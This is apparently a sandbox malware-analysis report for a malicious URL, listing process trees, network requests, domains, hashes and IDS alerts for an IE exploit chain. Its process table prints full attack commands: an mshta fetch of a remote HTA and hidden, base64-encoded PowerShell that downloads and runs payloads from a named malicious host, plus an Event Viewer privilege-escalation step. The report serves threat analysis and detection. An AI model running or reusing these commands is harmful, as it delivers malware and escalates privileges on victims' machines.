URL: | http://alfcck.xyz |
Full analysis: | https://app.any.run/tasks/108b06cd-d1be-4099-b682-feb75ed779e0 |
Verdict: | Malicious activity |
Threats: | A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection. |
Analysis date: | September 19, 2019, 06:07:16 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MD5: | A1F5212F5EA2AEA6E14BEFD77F43133D |
SHA1: | C64D1E6420DF128789186608494D60E5B3312377 |
SHA256: | 1CABD2C2BE329625A88F8DA578D5FCF9179A6022372953646B328D04E22B6D15 |
SSDEEP: | 3:N1Kffkdcf:CnUcf |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2764 | "C:\Program Files\Internet Explorer\iexplore.exe" "http://alfcck.xyz" | C:\Program Files\Internet Explorer\iexplore.exe | explorer.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Internet Explorer Version: 8.00.7600.16385 (win7_rtm.090713-1255) | ||||
3272 | "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2764 CREDAT:71937 | C:\Program Files\Internet Explorer\iexplore.exe | iexplore.exe | |
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Internet Explorer Version: 8.00.7600.16385 (win7_rtm.090713-1255) | ||||
3136 | mshta http://jeitacave.org/hta.hta | C:\Windows\system32\mshta.exe | iexplore.exe | |
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Microsoft (R) HTML Application host Exit code: 0 Version: 8.00.7600.16385 (win7_rtm.090713-1255) | ||||
3160 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -windowstyle hidden -exec bypass -nop -windowstyle hidden -exec bypass -EncodedCommand DQAKAEkARQBYACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvAGoAZQBpAHQAYQBjAGEAdgBlAC4AbwByAGcALwBwAHMAMAAwADEALgBqAHAAZwAnACkADQAKAA== | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | mshta.exe | |
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Windows PowerShell Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
504 | "C:\Windows\System32\Eventvwr.exe" | C:\Windows\System32\Eventvwr.exe | — | powershell.exe |
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Event Viewer Snapin Launcher Exit code: 3221226540 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3988 | "C:\Windows\System32\Eventvwr.exe" | C:\Windows\System32\Eventvwr.exe | powershell.exe | |
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Event Viewer Snapin Launcher Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2672 | "C:\Windows\system32\mmc.exe" "C:\Windows\system32\eventvwr.msc" | C:\Windows\system32\mmc.exe | Eventvwr.exe | |
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Microsoft Management Console Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3716 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -windowstyle hidden -exec bypass -EncodedCommand DQAKAEEAZABkAC0AVAB5AHAAZQAgAC0AVAB5AHAAZQBEAGUAZgBpAG4AaQB0AGkAbwBuACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGMAbABhAHMAcwAgAG0AcwBpAA0ACgB7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBtAHMAaQAuAGQAbABsACIALAAgAEMAaABhAHIAUwBlAHQAPQBDAGgAYQByAFMAZQB0AC4AQQB1AHQAbwApAF0ADQAKAA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAE0AcwBpAEkAbgBzAHQAYQBsAGwAUAByAG8AZAB1AGMAdAAoAHMAdAByAGkAbgBnACAAcABhAGMAawBhAGcAZQBQAGEAdABoACwAIABzAHQAcgBpAG4AZwAgAGMAbwBtAG0AYQBuAGQATABpAG4AZQApADsADQAKAA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBtAHMAaQAuAGQAbABsACIAKQBdAA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAE0AcwBpAFMAZQB0AEkAbgB0AGUAcgBuAGEAbABVAEkAKABpAG4AdAAgAGQAdwBVAEkATABlAHYAZQBsACwAIABJAG4AdABQAHQAcgAgAHAAaABXAG4AZAApADsADQAKAH0ADQAKAA0ACgAiAEAADQAKAFsAbQBzAGkAXQA6ADoATQBzAGkAUwBlAHQASQBuAHQAZQByAG4AYQBsAFUASQAoADIALAAwACkAOwANAAoAWwBtAHMAaQBdADoAOgBNAHMAaQBJAG4AcwB0AGEAbABsAFAAcgBvAGQAdQBjAHQAKAAiAGgAdAB0AHAAOgAvAC8AagBlAGkAdABhAGMAYQB2AGUALgBvAHIAZwAvADEAVQAyADIAbgBPAEoASABGAGQARABtAFkAYwBnAEMAUwAuAGoAcABnACIALAAiACIAKQANAAoAZQB4AGkAdAANAAoA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | powershell.exe |
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3060 | "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\Low\zp3qd0ym.cmdline" | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | — | powershell.exe |
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Visual C# Command Line Compiler Exit code: 0 Version: 8.0.50727.4927 (NetFXspW7.050727-4900) | ||||
2640 | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\admin\AppData\Local\Temp\Low\RESA9F1.tmp" "c:\Users\admin\AppData\Local\Temp\Low\CSCA9F0.tmp" | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe | — | csc.exe |
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Microsoft® Resource File To COFF Object Conversion Utility Exit code: 0 Version: 8.00.50727.4940 (Win7SP1.050727-5400) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2764 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LH043OAM\favicon[1].ico | — | |
MD5:— | SHA256:— | |||
2764 | iexplore.exe | C:\Users\admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico | — | |
MD5:— | SHA256:— | |||
3060 | csc.exe | C:\Users\admin\AppData\Local\Temp\Low\CSCA9F0.tmp | — | |
MD5:— | SHA256:— | |||
3060 | csc.exe | C:\Users\admin\AppData\Local\Temp\Low\zp3qd0ym.pdb | — | |
MD5:— | SHA256:— | |||
2640 | cvtres.exe | C:\Users\admin\AppData\Local\Temp\Low\RESA9F1.tmp | — | |
MD5:— | SHA256:— | |||
3060 | csc.exe | C:\Users\admin\AppData\Local\Temp\Low\zp3qd0ym.dll | — | |
MD5:— | SHA256:— | |||
3060 | csc.exe | C:\Users\admin\AppData\Local\Temp\Low\zp3qd0ym.out | — | |
MD5:— | SHA256:— | |||
2188 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5GRQ4O66KC581530CG5H.temp | — | |
MD5:— | SHA256:— | |||
3068 | csc.exe | C:\Users\admin\AppData\Local\Temp\Low\CSCE1F8.tmp | — | |
MD5:— | SHA256:— | |||
3068 | csc.exe | C:\Users\admin\AppData\Local\Temp\Low\goc5o6cd.pdb | — | |
MD5:— | SHA256:— |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2244 | msiexec.exe | GET | 200 | 104.28.18.126:80 | http://jeitacave.org/1U22nOJHFdDmYcgCS.jpg | US | executable | 3.43 Mb | malicious |
3136 | mshta.exe | GET | 200 | 104.28.18.126:80 | http://jeitacave.org/hta.hta | US | html | 466 b | malicious |
3160 | powershell.exe | GET | 200 | 104.28.18.126:80 | http://jeitacave.org/1808132.jpg | US | executable | 81.5 Kb | malicious |
3160 | powershell.exe | GET | 200 | 104.28.18.126:80 | http://jeitacave.org/pe.jpg | US | text | 462 Kb | malicious |
3160 | powershell.exe | GET | 200 | 104.28.18.126:80 | http://jeitacave.org/ps001.jpg | US | text | 81.6 Kb | malicious |
3272 | iexplore.exe | GET | 200 | 104.24.113.108:80 | http://alfcck.xyz/ | US | html | 7.59 Kb | malicious |
3272 | iexplore.exe | GET | 200 | 104.24.113.108:80 | http://alfcck.xyz/3.htm | US | text | 452 b | malicious |
2764 | iexplore.exe | GET | 200 | 204.79.197.200:80 | http://www.bing.com/favicon.ico | US | image | 237 b | whitelisted |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2764 | iexplore.exe | 204.79.197.200:80 | www.bing.com | Microsoft Corporation | US | whitelisted |
3272 | iexplore.exe | 104.24.113.108:80 | alfcck.xyz | Cloudflare Inc | US | shared |
3160 | powershell.exe | 104.28.18.126:80 | jeitacave.org | Cloudflare Inc | US | shared |
2244 | msiexec.exe | 104.28.18.126:80 | jeitacave.org | Cloudflare Inc | US | shared |
3136 | mshta.exe | 104.28.18.126:80 | jeitacave.org | Cloudflare Inc | US | shared |
Domain | IP | Reputation |
---|---|---|
alfcck.xyz |
| malicious |
www.bing.com |
| whitelisted |
jeitacave.org |
| malicious |
PID | Process | Class | Message |
---|---|---|---|
3272 | iexplore.exe | Potentially Bad Traffic | AV INFO HTTP Request to a *.xyz domain |
3272 | iexplore.exe | Attempted User Privilege Gain | ET WEB_CLIENT Possible Internet Explorer VBscript failure to handle error case information disclosure CVE-2014-6332 Percent Hex Encode |
3272 | iexplore.exe | Attempted User Privilege Gain | ET EXPLOIT Possible Internet Explorer VBscript failure to handle error case information disclosure CVE-2014-6332 Common Function Name |
3272 | iexplore.exe | Attempted User Privilege Gain | ET EXPLOIT Possible Internet Explorer VBscript failure to handle error case information disclosure CVE-2014-6332 Common Construct Hex Encode |
3272 | iexplore.exe | Attempted Administrator Privilege Gain | ET EXPLOIT Possible Internet Explorer VBscript failure to handle error case information disclosure CVE-2014-6332 Common Construct M2 |
3272 | iexplore.exe | A Network Trojan was detected | ET TROJAN Possibly Malicious Base64 Unicode WebClient DownloadString M3 |
3272 | iexplore.exe | Potentially Bad Traffic | AV INFO HTTP Request to a *.xyz domain |
3136 | mshta.exe | Potentially Bad Traffic | ET POLICY Possible HTA Application Download |
3136 | mshta.exe | Attempted User Privilege Gain | ET CURRENT_EVENTS SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl |
3272 | iexplore.exe | Potentially Bad Traffic | AV INFO HTTP Request to a *.xyz domain |
Process | Message |
---|---|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|